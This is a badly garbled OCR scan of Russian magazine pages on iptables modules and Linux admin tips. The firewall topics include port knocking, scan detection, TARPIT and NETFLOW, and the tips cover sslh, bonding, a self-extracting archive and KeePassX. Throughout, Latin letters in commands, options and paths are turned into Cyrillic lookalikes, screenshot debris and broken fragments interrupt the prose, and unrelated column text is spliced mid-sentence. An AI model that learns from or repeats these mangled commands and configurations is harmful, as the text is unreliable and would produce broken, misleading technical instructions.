ТРуф гапрез Рог УТ У1ерат 15153095, Ц.5. 

1Руб гапрез Рог УМ Утефпат 

ТРу4 гапрез Тог УН Улетпам 

ТРуб гапиез Гог МИ Мапи 

ТРуф гапяез Рог М Мапаати 

ТРуб гапрех Рог № Запоа 

ТРуф гапдез Гог М5 Затоа 

ТРуб гапаезх Тог УЕ Чегет 

1Руф гапрез Фог УЕ Уетеп 

ТРуё гапрез Тог РА бош АТглса 

ТРу4 гапаез Фог 2А ЗОШ АГг1са 

ТРуб гапяех Гог 2Ы Гат а 

ТРуф гапяез Рог 2Ы Габала 

ТРуб гапрез Рог 2 г1ифабме 

ТРу4 гапрезх Рог РИ РаебаБме 

гос го -ЧезкЕор:иизгУзпагейхе уеозри | . 


ы 


3 


|" 
софсососовоео-оьоьоче-оьоео-оьо 


ый 
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БУДУЩЕЕ 1РТАВЕЕЗ 


В настоящее время идет разработка замены текущего фреймворка пе Кег/р{аЫе$ под на- 

званием пНКабе$з. Что же готовит нам новый фреймворк? 

. Интерпретатор байт-кода в ядре; пользовательская утилита будет компилировать пра- 
вила в байт-код и передавать их с помощью Ме пк в ядро — при этом синтаксис пра- 
вил будет новый. 

. Синтаксис правил позволит задавать собственные действия для набора правил. 

. Уменьшение количества кода в режиме ядра. Это также позволит не обновлять ядро вся- 
кий раз, когда в пЦаЫе$ будут появляться новые возможности, поскольку большая часть 
из них будет реализована в режиме пользователя. 


Однако как же быть с существующими правилами? Неужели придется все переписывать за- 
ново? Отнюдь. В пКаШе$ предусмотрен слой совместимости с предыдущим синтаксисом, 
так что миграция, по идее, не должна вызвать затруднений. 


Разберем, что эти опции значат. Опция '--кпоскроц$' перечис- 
ляет порты, на которые необходимо «стучаться», '--5 СГ означает, 
что на порты необходимо «стучаться» строго в определенной по- 
следовательности; '--пате' присваивает имя данному правилу, 
через которое в /ргос/пе\хЕ ркпоск/ можно получить информа- 
цию о попытках Кпоскто’а; '--йте 30’ ограничивает максималь- 
ное время между «постукиваниями» в данной последовательно- 
сти (в секундах); '--ащосо$е 5' закрывает порт через пять минут. 

Но как же именно «стучаться»? Для этого имеется, напри- 
мер, утилита Прта3, входящая (в случае Убит) в одноимен- 
ный пакет. Для того чтобы открыть порт из указанного выше 
примера, выполни данные команды на клиенте: 

Подготовка базы 
данных для х{ деор 


$ зиао Ир1пе3 -с 1 -5 192.168.1.5 -р 4002 
$ зидо Ир1пё3 -с 1 -5 192.168.1.5 -р 31337 
$ зидо Ир1п#3 -с 1 -5 192.168.1.5 -р 2195 


Эти команды посылают один пакет с битом $\М на адрес 
192.168.1.5 (в твоем случае, понятно, он будет другим) на порты 
4002, 31337, 2195. Все! Теперь втечение пяти минут 5$Н открыт. 


ХТ Е$САМ 

Этот модуль позволяет отследить некоторые виды сканирова- 
ния на основе содержания пакетов. Информация об этих попыт- 
ках может быть как записана в лог, так и использована в даль- 
нейших правилах для превентивного предотвращения атаки. 
Опции модуля ('-т |5сап'): 


У Терминал - гот@гот-дезКор: -Лри пе{Поми-1.8 


Файл Правка Вид Терминал Переход Справка 
гот@гот-дезКфор:-$ с 1рт_пе{{!1ом-1.8/ 
гот@гот-дезКфор:-/1рх_пе{{1ом-1.8$ ./соп1риге && таке 
Кегпе] уег510п: 3.2.0-33-репег1с 
Кегпе] зоигсе$: /116/тоди1е$/3.2.0-33-#епег1с/Би119 


ркя-соп1я Тог уег$1оп 1.4.12 ех1${15: Уе$ 
ТрфаБ1е5$ 1пс1и4е ра{№: — (рКя-соп!18я) 

ТрфаБ1ез тоди]е ра{П: /116/хфаБ]е$ (рК-соп!18) 
Сгеа{1п8р МаКе!11е.. допе. 


№м гип: маКе а1] 115%а11 


Сотр111п8 Рог Кегпе1 3.2.0-33-репег1с 


СС [М] /Поте/гот/1рх_пе{т{10м-1.8/1р+_МЕТЕЕОМ.о 
Ви1191п8 тоди]е$, з{аяе 2. 

МООРОЗТ 1 тоди]е$ 

сс /Боте/гот/1рх_пе{{1ом-1.8/1рх_МЕТЕИОМ.тод.0 
ЕО [М] /Поте/гот/1рх_пе{{1ом-1.8/1р+_МЕТЕЕОМ.Ко 


Трфаб1е$ Б1пагу уег$1оп: 1.4.12 (детесфеЯ Тгот /$61п/1рфаБ1е$) 


таКе -С /116/тоди]е$/3.2.0-33-репег1с/Би119 М=/Потме/гот/1рт_пет{1ом-1.8 тоди1е$ 
маКе[1]: Вход в каталог `/и$г/$гс/11пих-Веадег$-3.2.0-33-бепег1с' 


маКе[1]: Выход из каталога `/и$г/5гс/11пих-Веадег$-3.2.0-33-репег1с' 
гот@гот-дезКфор:-/1р*_пе{{10м-1.8$ 1 


Сборка модуля . --Феа!Ш — срабатывает, если ТСР-пакет не относится 
ре МЕТЕЕОМ/ ни к одному из открытых соединений. В число подоб- 
ных типов сканирования входит, например, ХМАЗ$-нее- 
сканирование или Н№-сканирование; 
= +х . 


--зуп5сап — срабатывает, если производится попытка 5\М- 

сканирования — то есть удаленный хост не проходит трех- 

^ фазное (ЗУМ/АСК/ЗУМ) подтверждение соединения. В слу- 
чае с \ММпаом/$ ХР могут быть ложные срабатывания; 

. --сСпосап — срабатывает на самый «тупой» вид сканирова- 
ния, который производится путем полного установления со- 
единения с последующим отбоем; 

. --Огзсап — реагирует на то, что поток данных течет исклю- 

чительно в направлении удаленной стороны. То есть, до- 

пустим, соединился кто-то с ЭЗН-сервером, он начал вы- 
давать информацию — а та сторона возьми да и заверши 
соединение. Правда, для отдельных протоколов, которые 
подразумевают однонаправленные большие потоки данных 

(например, ЕТР ВАТА), срабатывания будут ложными, так 

что этот режим надо применять только в том случае, если 

поток данных гарантированно должен быть двусторонним. 


Рассмотрим для примера превентивный бан при попытке 
ЗеаНИ-сканирования. Это будет иметь смысл, если на твоем 
хосте запущены службы и ты хочешь заблокировать злоумыш- 
ленника, чтобы он не смог даже проникнуть на открытые для ле- 
гитимных пользователей сервисы. При использовании по умол- 
чанию политики ОРОР разумеется, доступ на эти порты должен 
быть открыт перед использованием превентивного бана. 
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ФАО РЕК Ме Клея РГО ИБ гисяь, ВА, Оше 


Бата рег весе 


эн ь | 


Зы 12 00 Зы 20 00 Мы 6.9 
АезлегЕ вы 
ТР Е = ОР т 4.0  П0Б.0И би 2. Га. О 1“ 

Шимени. пап лаг 0ит пап  Таымр [п 

0 отнсА пзп  ЧлагА бл па Гры 

тег егирееЕ 131.08 19.0: ол :0.06 0.0 Тв 

ОЕЬег 105 пап Главу би пап  ТпагА} ТП 

24.95 ол м.п 


м тотм. 


№ыт 04-00 


Пример графика, построенного наоснове данных МЕТЕЕОМ/ 


# 1рфаб1ез -А ТМРИТ -1 ефИ1 -т гесепе --паме «= 
$ТЕАЕ$САМ --ираафе --зесопа$ 43200 -] ОКОР 


# 1рфаб1ез -А ТМРИТ -1 ефИ1 -р ср -т 15сап == 
--5$еа1{И -т гесепе --пате ЗТЕАЕ$САМ --зе* -3) ОКОР 


Рассмотрим действие сначала второго правила, а затем 
первого. Если обнаружено скрытое сканирование, модуль ядра 
ХЕ гесет заносит адрес в свою внутреннюю таблицу ('--5ег) 
под именем ЭТЕАЕЗСАМ (которую, к слову, можно посмотреть 
в /ргос/пе\/х{Е гесеп/ТЕАЕЗСАМ) и дропает этот пакет. При лю- 
бом последующем обращении с данного адреса в течение 
43 200 секунд (12 часов) доступ с того адреса будет запрещен, 
а время последней попытки обновится, и отсчет 12 часов пой- 
дет заново. 


ХТ ОЕГООЕ, ХТ ТАВРИТИХТ СНАОЗ$ 

Эти три модуля реализуют цели для правил. Я решил их объеди- 
нить, поскольку, по сути, они делают одно и то же — отвечают 
на некорректные (или соответствующие заданным правилам) 
ТСР-пакеты. Но делают они это по-разному. Модуль ОРЕЦОПЕ, 
например, при попытке $/М-сканирования отвечает на пакет 
ЗУМ так, как если бы порт был открыт. ТАВРИТ позволяет под- 
весить соединение путем ответа пакетом с нулевым размером 
окна. СНАО$ же позволяет отвечать стохастически — либо 
ОЕГОБЕ/ВЕДЕСТ, либо ТАВРП/ВЕЗЕСТ, в зависимости от опции 
'.-аецае' или '-{агри’. Настройки вероятности находятся в ката- 
логе /5у$/тодце/хЕ СНАОЗ/рагатщег$/. В общем-то, эту функ- 
циональность можно реализовать и ручками, используя стан- 
дартный модуль х{_$айзйс ('-т Зайзйс --тоае гапаот"), к тому 
же в Убити он не работает — поэтому мы его рассматривать 
не будем. А вот на ТААРП остановимся подробнее. У данной 
цели есть три параметра: 


+ Нема Вий дет - [РИ К] 


ВМТ / Ройсу 


Етемиа! ВиПаег — 
главное окно 


727 


. -агрИ — собственно и производит названное действие, 
то есть при попытке коннекта на порт отвечает пакетом с ну- 
левым размером окна; 

. --Попеурот — устанавливает «обычное» соединение и более 
ничего не делает, позволяя отлавливать поступающие паке- 
ты. К сожалению, этот режим сегодня практически бесполе- 
зен, поскольку все современные протоколы требуют обмена 
данными; 

. --ге5е — посылает в ответ на попытку пакет с битом ВАЗТ. 


Замечу, что при использовании этого модуля необходимо 
отключить отслеживание соединений (оно и понятно — ядро 
в противном случае будет кушать ресурсы). Далее приведен 
пример использования этого модуля для порта 53: 


1рфаб1ез -Е гам -А РВЕКОЧТТМ№ -1 ефИ1 -р ср +" 
--ароге 53 -3 МОТКАСК 

1рфаб1ез -А ТМРИТ -1 ефИ1 -р ср --ароге 53 «=! 
-] 10б --10о5-ргейх "0№ 5 ТАКРТТ: " 

1рфаб1ез -А ТМРИТ -1 ефИ1 -р ср --арогЕе 53 «= 
-3 ТАВРТТ 


Первое правило отключает отслеживание пакетов на порт 
53, второе заносит эти пакеты в лог, ну а третье как раз и реа- 
лизует цель ТАВРП. 


1РТ МЕТЕЕО\/ 
Существует также реализация МЕТЕЕОМ/-сенсора для рфаЫе$. 
Поскольку он реализован как модуль ядра, то и быстродей- 
ствие у него выше, чем у аналогичных сервисов, работающих 
в режиме пользователя (5оНЙо\ма). Пара слов о том, что такое 
МЕТЕЕО\М/. Это сетевой протокол и инфраструктура, позволяю- 
щие собирать статистическую информацию о сетевом трафике. 
Эта информация, конечно, не столь подробна, как, допустим, 
вывод {сраитр, но для статистического учета и рисования на- 
глядных графиков ее вполне достаточно. 

Модуль р МЕТЕЕОМ/ необходимо компилировать из исход- 
ников, которые можно получить, либо используя ОК: 


1Е с1опе 21+: //1р-пеЕЯом. 21+. зоигсеРогее .пее/+ 
51гоо* /1р&-пеЕЯом/1ре-пеЕ Йом 


либо просто скачав текущую версию с БИ.1у/7ЗКВАа. 


МАТСН-МОДУЛЬ МЕТЕШТЕВ 
СВОИМИ РУКАМИ 


Написать свой модуль для рта е$ не настолько сложно, как ка- 
жется на первый взгляд. Для этого требуется написать модуль 
ядра и модуль раЫе$. 

В модуле ядра должна быть объявлена структура х{ тасп, 
описанная в заголовочном файле Ппих/пе Кег/х та ез.п. Боль- 
ше всего нас интересует поле .тасп. В нем содержится имя 
функции, которая проверяет, соответствует ли пакет критериям 
или нет. 

В модуле же пользовательского режима должна быть объ- 
явлена аналогичная структура жа ез тафсп, описанная в заго- 
ловочном файле жаЫе$.п. Интересующие нас поля (содержат 
имена функций): 

. П@р — выводит справку по данному модулю; 

.  рагзе — парсит передаваемые параметры командной стро- 
ки и формирует на их основе структуру, которая будет затем 
передана в ядро; 

. Шиа спеск — проверяет структуру, передаваемую ядру; 

‚ „рип р— добавляет вывод в «р\аШез -1»; 

. заме — добавляет вывод в |\фаЫез-за\уе. 


Более подробную, хотя и несколько устаревшую информа- 
цию о том, как написать собственный модуль р\аШез$, можно 
найти по ссылке: БИ.1у/УЕ6 Ур. 


122 Отхога 


" Терминал - [5сгееп 0: БазВ] а1ап@зегуег:./е1с/$Погеуиа! 


Файл Правка Вид Терминал Переход Справка 


#Взупс(АССЕРТ) $РЕМ 


мапгт 


$ЕМ ]апм 
$ЕМ ]апи 


$ОУВСЕ ОЕЗТ РВОТО 
КАТЕ 05ЕВ/ — МАКК 
иТТСН 


ми бКОУР 


1/5ес 
АССЕРТ 1]апм:192.168.0.18 подгх 


Р1п8(АССЕРТ) 
СЕМА(АССЕРТ) 


зепа: $бЕМА_$ЕВУЕК 
#епа: $бЕМА_$ЕКУЕК 


Компиляция потребует установки 'рфае$-деу и хидеров 
ядра: 


$ зидо арЕ-веф 1п5%а11 1р+аб1ез-4еу Кегпе1 -Пеадег$ 
$ ./сопйвиге && таке 

$ зидо таКе 1п5$%а11 

$ зидо 4ерто4 -а 


Обновление ядра, конечно, после этого лучше запретить 
или каждый раз перекомпилировать данный модуль — правда, 
на последних версиях ядра он может не работать. 

Настраиваем, передавая параметры модулю ядра, — 
как правило, для этого прописываем их в файл /ес/тоаргобе.а/ 
пе{Ном..сопт, а модуль добавляем в /ес/тоаце$. Опишу некото- 
рые опции этого модуля: 

. Чезнпаноп — единственный обязательный параметр, 
указывающий адрес и порт коллектора, может быть ука- 
зано несколько. Например: «ЧезипаНоп=127.0.0.1:9996, 
192.168.1.7:2055»; 
пасёуе_ Нтеоц — тайм-аут бездействия потока, по истече- 
нии которого информация о нем передается на коллектор. 
По умолчанию 15 секунд; 
асйуе_ Итеоц{ — тайм-аут активности потока, по его исте- 
чении производится то же действие. По умолчанию 1800 
секунд (30 минут); 
пахНом/5 — максимальное количество учитываемых по- 
токов. Используется для предотвращения Оо3З-атак. 
По умолчанию 2 000 000, что, на мой взгляд, многовато. 


Далее я приведу простой пример конфигурации данного 
модуля. Запишем его опции в файл и сделаем модуль автоза- 
гружаемым: 


# еспо ор*1оп$ 1ре_МЕТЕЕОМ де${1па{1оп=+= 
127.0.0.1:9996 тахЯом$=50000 ‹“ 
/ефс/тоаргоБе.а/пеЕЯом. соп+ 


# еспо 1р*_МЕТЕЕОМ >> /ефс/тоаи1е$ 


Включаем учет для проходящего трафика: 


# 1рфаб1ез -А РОКИАКО -Э МЕТЕЁОМ 


Замечу, что если ты хочешь считать весь трафик, то это 
правило должно стоять впереди всех остальных. Учти также, 
что если коллектор находится на другом компьютере, то мо- 
жет возникнуть небольшая проблема — поскольку в момент 
загрузки модуля сеть еще может быть не сконфигурирована, 
он не сможет соединиться с коллектором. То же самое, впро- 
чем, относится и к локальному коллектору — он может быть 


УОУВСЕ 
СОММеТМТТ 


РОВТ($) 


Один изконфигов 
Зпогемгай 


РАМСЕК 


Крайне не рекомен- 
дуется производить 
какие-либо действия 
стра е$ через Сеть. 
Ты рискуешь остаться 
без связи с управляе- 
мым сервером. 
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не запущен втот момент. Для решения этой проблемы размести 
следующие две строчки в /&с/гс.!оса!: 


В1е=" /ргос/у$/пе*/пееЯом/ае${1па*1опт" 
фез& -е "$81е" && дез+="$ (са $#1е)" && «: 
есНо "$аез*" > "$Я1е" 


МОДУЛЬ 5ТНМС 

Стоит также упомянуть модуль $па — он позволяет произво- 
дить поиск заданной строки в пакете и выполнять какие-либо 
действия. Проще всего продемонстрировать пример, а затем 
его разобрать. В качестве примера будет использована защита 
данным модулем веб-сервера от некоторых сканеров уязвимо- 
стей, имеющих привычку писать слово м/О0\М/О (4 в запросе СЕТ. 


# 1рфаб1ез -А ТМРИОТ -1 ефИ1 -т гесеп® --паме «‹! 
м@9Емо0е --ирааее --зесоп4$ 43200 -] ОВОР 


# 1рфаб1ез -А ТМРОТ -1 ефп1 -р ср --арогЕ 890 «= 
-т $и1пе --Ф0о 70 --а1в0 бт --$ЕГ1пв += 
"СЕТ /м00м90е" -т гесеп* --пате м90{им@90т += 
--зеЕ -) ОВОР 


Практически, за исключением использования модуля ${па 
вместо |5сап, эти правила почти ничем не отличаются от тех, ко- 
торые приводились в примере про скрытое сканирование. По- 
этому я опишу только опции модуля Зипод: 

. Лот И --Ю — указывают смещения, откуда и по какое ис- 
кать — поддерживается как десятичная, так и шестнадцате- 
ричная форма (предваряемая Ох). По дефолту ищется от на- 
чала и до конца пакета; 

--а!до — алгоритм поиска строки. Поддерживаются алгорит- 

мы бт (Бойера — Мура) и Ктр (Кнута — Морриса — Прат- 

та). Первый считается в общем случае самым быстрым, его 

и рекомендую использовать; 

--5ипд и --пех-5па — паттерн поиска в обычном и в шест- 

надцатеричном виде соответственно. 


Еще раз замечу, что правила приведены исключительно 
в качестве примера и могут быть усовершенствованы. 


ФРОНТЕНДЫ КИРТАВЕЕ$ 

В некоторых случаях удобнее использовать фронтенды 

к ртаыЫе$. Они, возможно, снижают гибкость, но облегчают ра- 

боту с правилами. Таковых имеется достаточно много, и далее 

рассмотрим наиболее интересные из них: 

. ИМ (Чпсотрисажеа Еге\ма!) — действительно простой фрон- 
тенд. Используется по умолчанию в Убита, предназначен 
для начинающих пользователей; 

Зпогемиа! (зпогемиа!.пе{) — строго говоря, фронтенд не толь- 
ко к ртаы 6$, но и к утилитам {с и р (которая входит в состав 
|ргоще2). Поддерживает множество интересных возможно- 
стей (как, например, Ми 1$Р когда имеется несколько про- 
вайдеров, — с обычным рфаЫе$ возникают некоторые слож- 
ности конфигурирования), добавляет уровень абстракции, 
относительно легко конфигурируем, и есть даже возмож- 
ность писать собственные модули; 

Теит (Тегт.Ююо0-рго]ес{$.ога) — тоже достаточно интересная 
утилита, упрощает написание правил прфаез$, синтаксис 
конфига С-подобный; 

Нех-Р\м (6 И.1у/1826601!) — еще один фронтенд к ра ез, син- 
таксис аналогичен 1р®м; 

Етема! Вийаег (м/и. РмбиНаег.ога) — С@\-генератор пра- 
вил. Поддерживает не только рфаШе$, но и много других 
файрволов (таких как С!$со, р®м, раске НКег...). К сожале- 
нию, именно поэтому правила, генерируемые им, чересчур 
многострочны и длинны. Удобен втом случае, если утебя ге- 
терогенная сеть и надо управлять сразу несколькими бранд- 
мауэрами. 


ЗАКЛЮЧЕНИЕ 

В пайКег/рфа е$ появляются все новые и новые возможности, 
и я рассмотрел далеко не все из них, возникшие в последние 
годы. Тем не менее я постарался описать наиболее интересные 
примеры применения модулей, как стандартных, так и не очень. 
Если же ты хочешь узнать больше — дерзай. == 
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БУБЕН НА 
ПРОКАЧКУ 


72.3 


Константин 
Разделённый 
ака 4 7ег0 
(ЧепСогоо{@ 
дтай.сот 


ПОГУРМАНИМ? 
НЕОБЫЧНЫЕ РЕЦЕПТЫ 
В ПОМОЩЬ АДМИНАМ 


Ежедневно перед юниксовым администратором встает масса разносторонних задач. 

Накопивший за многие годы солидный опыт, он каждый раз вытаскивает из потертого 

багажа ответов готовые решения. Все работает, но можно ли осовременить традици- 
онные рецепты, приправив их новыми подходами? Легко! 


ЭКОНОМИКАДЛЯ ПОРТОВ 
Обычно, чтобы усложнить инвентаризацию портов автоматическими средства- 
ми с целью применения эксплойтов, меняют номер прослушиваемого порта 
той или иной службы на какой-то нестандартный. Такой подход будет вполне 
успешным решением в борьбе, скажем, против червей, но вскинет кверху 
лапки при первой же попытке полного целенаправленного сканирования зло- 
умышленником. Нехорошо это. Так давай попытаемся запутать неприятеля! 
Служба под названием $$ делает на первый взгляд нечто невероятное — 
позволяет использовать на одном порту несколько сервисов, таких как ЭЗН 
и НТТР$. Внимательный читатель возмутится и заявит, что невозможно ре- 
ализовать такую логику, так как при попытке забиндить уже занятый порт 
другой программой ядро вернет сообщение об ошибке, и он будет прав. Ис- 
тина кроется в известной пословице: все гениальное просто. На самом деле 
прослушивает порт непосредственно демон $$, а поступающие от клиентов 
запросы утилита парсит, анализируя первый пришедший пакет, понимая 
протокол и пересылая данные на реальный порт интерфейса Тоорраск, где 
работает настоящая служба. Такая техника называется мультиплексировани- 
ем портов. В итоге получается, что настоящие сервисы работают, но только 
внутри подсети 127.0.0.0/8, то есть остаются недоступными напрямую извне. 
Возможно, звучит все это пугающе, но настраивается легко, с пол- 
оборота. Давай же сделаем прямо сейчас обслуживание на 443-м порту ЭЗН 
и Араспе с тоа_$$1 (поддержка НТТР5). 


К счастью, $$ уже успел попасть в репозитории самых популярных дис- 
трибутивов, поэтому установим его с помощью менеджера пакетов: 


# арф-веф 1п${а11 $$1И 


5$ принесет с собой небольшой конфиг /@с/аетаи К/$И, состоящий 
всего из трех строк: 


# Изменяем КУМ на уез, только так $$1И запустится 
ВУМ=уе$ 

# Путь к бинарнику 

ОАЕМОМ=/ изг/$61п/$$51А 

# Параметры запуска 

ОАЕМОМ _ОРТ$=" --изег $511 --115%еп 0.0.0.0:443 ++ 
--55И 127.0.0.1:22 --$$1 127.0.0.1:4443" 


На параметрах запуска остановимся подробнее. Пользователь, от ко- 
торого выполняется $$, находится в опции --изег. Ключом --йеп мы обо- 
значаем прослушиваемый демоном [Р и порт на всех доступных интерфейсах 
(0.0.0.0). Добавление --$$1 приведет к указанию !Р-адреса и порта службы 
Ореп5$Н. Обрати внимание, что значение 1Р равно 127.0.0.1, то есть все 


= $УМ/АСК 


подключения будут только по интерфейсу 1оорБаск. Соответственно, опция 
--5$| укажет прослушиваемый [Р- и $$5-порт, а соединения также останутся 
в кольцевом интерфейсе. 

Чтобы придать смысл нашей реализации, оставив только прослушивание 
службами 127.0.0.0/8 сети, перенастроим адресу $$Па в /@с/5$П/$$Па_сопйд: 


[1$епАааге$$ 127.0.0.1 


Так же поступим и с конфигурацией Араспе, изменив секцию <ИМоаце 
по4_$$1.с> файла /@4с/араспе2/ром$.соп:: 


<Т+Моач1е тоЯ_$$1.с> 
15%еп 127.0.0.1:4443 
</Т+Моди1е> 


Время запустить $51: 


# зегу1се $$1й $фагЕ 


Осталось насладиться результатом, приконнектившись на 443-й порт од- 
новременно 5$Н-клиентом и веб-браузером. 


БОНДИНГ, ДЖЕЙМС БОНДИНГ 

Все мы живем миром ПТ; а потому знаем, насколько важен бэкап. Но это сло- 
во может употребляться не только применительно к файлам. У многих из нас 
есть и резервные интернет-каналы, чтобы в случае чего не терять связь 
с цифровым кислородом. Страховка — это хорошо, но вот минус — во время 
падения одного из провайдеров нам приходится вставать с мягкого кресла 
и перекидывать на роутере пару патчкордов. Это неудобно, и потому люди 
находят решение в автоматическом переключении между каналами с помо- 
щью смены маршрутов. Для этого пишется скрипт, который пингует роутер 
основного провайдера и, в случае неудачи, меняет шлюз на резервного про- 
ва, тем самым перенаправляя трафик по новому пути. Простой пример такого 
скрипта, запускаемого из крона: 


#1! /Б1п/Ба$И 


# Получаем текущий маршрут по умолчанию, то есть шлюз 
# провайдера 


СУВВЕМТ=$(1р г | эгер 4ефаи1е | сиё -а " " -+3) 
ВОЧТЕК1=10.1.1.1 # Основной шлюз первого провайдера 
ВОЧТЕК2=10.2.1.1 # Шлюз второго провайдера 


# Пробуем пинговать роутер первого провайдера 
1+ р1пё -с 3 ФВОЦТЕВ1 > /4еу/пи11 2>&1; Веп 
# Сервер доступен 
# Проверяем текущий маршрут: является ли он основным? 
а СУВКЕМТ != $ФКОУТЕК1 |; еп 
# Нет, не является, значит, меняем маршрут 
1р г а аефаи1* у1а $ВОУТЕВ1 


в 
е15е 
# Сервер КОУТЕВ1 оказался недоступным 
# Проверяем текущий маршрут: является ли он путем через 
# второго провайдера? 
1+ [ $СУВВЕМТ != КОЧТЕК2? ]; Пеп 
# Нет, не является, значит, меняем маршрут 
1р г а аде+аи1+ \1а ФВОЧТЕВ2 


геарег-- 


Я6гег0@]оса]по${:-—$ $$П -1 геарег габб1х-геарег. 1оса1 
геарег@2а61х-геарег.1о0са1'$ ра$$мога: 


Га${ 10#1п: Ти Мау 2 13:01:51 2013 {гот 10.1.106.5 
[геарег@?абЬ1х-геарег.1оса1 -]$ В 


КееРа$$Х залогинился на сервер занас 
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У© Новая запись 


Группа: 89 в > Значок: 

Название: ;аБЫх-геарег 

Имя: геарег 

Ссылка: гаБЫх-геарег.|оса( 

Пароль: ++ 

Повтор пароля: |********** Генерация. 

Качество: к мини иисжиие) 80 ВК 
Ацто-Туре: $51 -1 {Узегпате} {ОВЕ{ЕМТЕВ}{ОЕГАУ 

 одавенналий: 2000}{Ра$5мога{ЕМТЕВ} 


Срок годности: 01.01.00 0:06 (С) у @ Никогда 


Вложение: мых 


Заполняем поле комментария нужными инструкциями 


Тоо* 


На И Е р Е И ТИ 


И ПТИ Е Е В Е 


Приглуцаненая все 


ыы Ти о Е 
сАаолут. Тая что обостнечиты боддлАгр АЕРИДУ В додриОСЫЫ © обленрьле На Брыерый. Сома Гыбиееуиыесьнлия риблльсыицримя СА-ЕСР! сериныой аб Буоеныйй 
Базываь: - СНЕЗР 


УС воина ты Гая г СВР - Бить БАЬЛ. 1 ЗНИСВААКС т Г растраюрутииным, гыс-оЗНыср-ыетоуАт 


Для подключающихся клиентов веб-сервер прослушивает 443-й порт 


Все это по большому счету костыль на колесиках, поэтому правильнее 
и даже проще настроить так называемый бондинг (Бопата). Под этим словом 
скрывается техника агрегирования (объединения) двух сетевых интерфейсов 
в один с целью суммировать пропускную способность. А в качестве бонуса 
мы получаем важную особенность — при падении одного из объединенных 
каналов трафик начинает ходить через другой интерфейс, а для пользователя 
остается абсолютно незаметным, что один из каналов недоступен. Уже хочет- 
ся? Тогда создавай скрипт: 


#1! /61п/Ба$П 
# Загружаем модуль ядра и передаем параметры 
тоаргобе Боп91п> тоде=@ т11топ=100 


1+сопй> ефН0 домт 
1+сопй8 ефН1 аомп 


# Интерфейс первого провайдера 
# Интерфейс второго провайдера 


# Указываем МАС для интерфейса Бопа@ 
1+сопй8 бопа0 Им ефпег 01:02:03:04:05:06 
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# Поднимаем интерфейс Бопа@ с указанным ТР-адресом геарег-- 


1Рсопй Бопа0 192.168.0.1 ир [гоо@га6б1х-гер -]# грт -\а 
кая М /маг/иим/ ВЕ т1 
# Переводим оба интерфейса в $1аме-режим кения» (В ре Нина 
Ри ме Бонае ео о Пенн /етс/рат.4/раззнога-аи® 
+ ....Ё.... © Гефс/рат.4/зтагфсага-аитП 
5.5....Т. С ИГООК/ базП_ргот11е 
Стоит внимательнее взглянуть на передаваемые модулю кавини в Гь /ес/19.50.сопф.а/Кегпе1-2.6.32-279.е16.х86_64.соп 
ядра параметры. Параметр тоде=0О означает, что переда- пера , т И. ть 
ил ет. моди1е$/2.6.39-200.24.1.е16иеК.х86_64/тоди1е$.а11а$.61п 
а ана от ие о .......Т. = /146/тоди1е5/2.6.39-200.24.1.е16иеК.х86 64/тоди1ез .Чер.Ь1п 
ООО ЛИ ЗЕ СВИТ ОстаВлЯыпростнива щие Т. — /146/тоди1е$/2.6.39-200.24.1.е16щеКк.х86_64/тоди1е$ .зутбо] 5.64 п 
сурсы, когда можно их безжалостно заэксплуатировать? Вто- 11551 ПЕ /и5г/5Паге/гАп/ир2дафе_с11еп/риб11с-уут-016.геро 
рая опция — пйтоп=100 означает, что проверять доступность «Мака > /маг/1оЕ/Еат 
каналов нужно каждые 100 миллисекунд. „Ме жениьь /маг/гип/Едт 
После запуска скрипта появится новый интерфейс Бопа0, а р он р ой а ооВЕ 
который поможет тебе спать спокойно, больше не заботясь ге в т я ИЕ Е ЭР ны 


о проблемах с интернетом :). Зобивь ТГ» 


ии Ра 
ИНО 5 


АРХИВ-САМОБРАНКА 

Весьма часто задачи администрирования сводятся к распро- 
странению каких-либо данных на М-е количество серверов. 
Для автоматизации этого процесса многие админы посове- 
туют разместить распространяемый файл на НТТР-сервере, 
а затем написать скрипт, который пробежит по списку сер- 
веров, запустив \/деЕ{ и распаковав кусок данных. Проблема 
кроется в лени, не всегда хочется вспоминать или поднимать 
доступный для всех машин веб-сервер, а ведь надо еще зайти 
на него и разместить данные. Впрочем, другая часть админов 
посоветует воспользоваться СР для заливки файла на каждый 
сервер, чтобы затем, залогинившись через 5$Н, распаковать 
содержимое. Этот подход уже немного проще, но все равно 
заставит зевать в процессе. Мы не будем играть в три хода РУБ 
(логин, загрузка, исполнение), а поставим мат путем размеще- 
ния необходимых данных прямиком в скрипте, который оста- 
нется только запустить. Давай создадим, в лучших традициях 
\ММпаом/5 :), самораспаковывающийся архив. Это проще, чем 


На прилагаемом кжур- 
налу диске лежит утилита 
Техесщег, которая пре- 


кажется на первый взгляд, ведь в своей основе это обычный $1- вратит серую рутину за- 
скрипт следующего содержания: пуска множества команд 
в удовольствие. 


#1! /Б1п/5И 

# Для Таг.672-архива 

се -е '1, /^ОАТА $ЕСТТО№/4' $0 | Базеб4 -а | +аг -]х 

# Для Фаг.57-архива 

# зе4 -е '1, /^ОАТА_$ЕСТТОМ№$/а' $0 | Базеб4 -а | «=: 
таг -ф#х 

ех1{ 

РАТА_$ЕСТТОМ 


Сохраним скрипт под именем агспм№е.51 и допишем прямо в него данные архива, зако- 
дировав предварительно все в ВазебА: 


$ саф агсп1\е.каг.672 | Базеб4 >> агсИ1уе. $ 


Готово! Теперь если выполнить получившийся агсйме.$П, то в текущем каталоге по- 
явится уже распакованный Таг.072-архив. Удобно. Работает трюк элементарно, «зеа -е 
'1,/^БАТА_ЗЕСТЮМУ/а' $0» отрезает в запущенном скрипте все строки, находящиеся от на- 
чала файла до ПАТА_ЗЕСТ!ОМ, а оставшиеся закодированные в Вазеб4 данные выводит 
в ${Ао\щ, которые через пайп передаются на декодирование «базеб4 -4» и уже потом попа- 
дают на работу Таг, который распаковывает первоначальный архив «аг -]х» в текущий ката- 
лог Так что путем дописывания дополнительных команд перед РАТА ЗЕСТЮМ ты можешь 
запросто расширить функционал архива-самобранки под собственные нужды. 


ВСПОМНИТЬВСЕ 

Современное общество заливают огромные потоки информации, а наш мозг не в состоя- 
нии поддерживать актуальность всех поступающих в память данных. Ежедневно мы посе- 
щаем десятки сайтов, сервисов, все мы имеем пароли от собственных серверов. Рано или 
поздно человек приходит к тому, что важную информацию нужно где-то хранить. И обра- 
щается к специальным программам для организации и хранения паролей. Среди них ока- 
зывается и моя любимица — КееРа$$Х. Открытый продукт, доступный под все популярные 
платформы, шифрует данные АЕ$-алгоритмом с 256-битным ключом. 

Да, КееРа$$Х можно использовать просто как хранилку паролей, в которой приходится 
